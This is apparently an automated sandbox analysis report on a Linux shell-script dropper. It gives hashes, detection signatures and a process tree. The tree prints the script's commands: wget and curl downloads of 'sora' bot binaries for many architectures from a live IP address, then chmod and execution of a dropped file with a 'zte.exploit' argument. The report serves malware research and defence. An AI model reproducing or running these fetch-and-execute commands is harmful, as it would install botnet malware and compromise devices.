Analysis
-
max time kernel
27s -
max time network
25s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 03:05
Static task
static1
Behavioral task
behavioral1
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
-
Size
2KB
-
MD5
5ee0ae1a52cdb3d257932d6b048f6846
-
SHA1
074cd5bc461923829a352d3d3b74ca92b72e030a
-
SHA256
f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70
-
SHA512
7f917bcdf1f7be589cd8fdd2455740907a4d4941f63b4f4eb548a7ff83a4a1a553aeb5f572a6bbfdd02096c32dc9223b8985f1754494d42ef5e1a16a4a9dd25a
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 829 chmod 779 chmod 865 chmod 882 chmod 751 chmod 763 chmod 793 chmod 809 chmod 838 chmod 850 chmod 734 chmod 744 chmod 757 chmod 844 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 735 robben /tmp/robben 745 robben /tmp/robben 752 robben /tmp/robben 758 robben /tmp/robben 764 robben /tmp/robben 780 robben /tmp/robben 794 robben /tmp/robben 810 robben /tmp/robben 830 robben /tmp/robben 839 robben /tmp/robben 845 robben /tmp/robben 851 robben /tmp/robben 867 robben /tmp/robben 883 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 737 wget 741 curl 743 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh
Processes
-
/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh1⤵
- Writes file to tmp directory
PID:709 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:712
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:721
-
-
/bin/catcat sora.x862⤵PID:732
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:735
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:737
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:741
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:743
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:744
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:745
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:747
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:749
-
-
/bin/catcat sora.x86_642⤵PID:750
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:752
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:754
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:755
-
-
/bin/catcat sora.i4682⤵PID:756
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:758
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:760
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:761
-
-
/bin/catcat sora.i6862⤵PID:762
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:764
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:766
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:769
-
-
/bin/catcat sora.mpsl2⤵PID:777
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:779
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:780
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:783
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:787
-
-
/bin/catcat sora.arm42⤵PID:791
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:794
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:797
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:801
-
-
/bin/catcat sora.arm52⤵PID:807
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:810
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:813
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:817
-
-
/bin/catcat sora.arm62⤵PID:826
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:830
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:833
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:835
-
-
/bin/catcat sora.arm72⤵PID:837
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:839
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:841
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:842
-
-
/bin/catcat sora.ppc2⤵PID:843
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:845
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:847
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:848
-
-
/bin/catcat sora.ppc440fp2⤵PID:849
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:850
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:851
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:853
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:856
-
-
/bin/catcat sora.m68k2⤵PID:863
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:867
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:869
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:872
-
-
/bin/catcat sora.sh42⤵PID:880
-
-
/bin/chmodchmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc2⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/robben./robben zte.exploit2⤵
- Executes dropped EXE
PID:883
-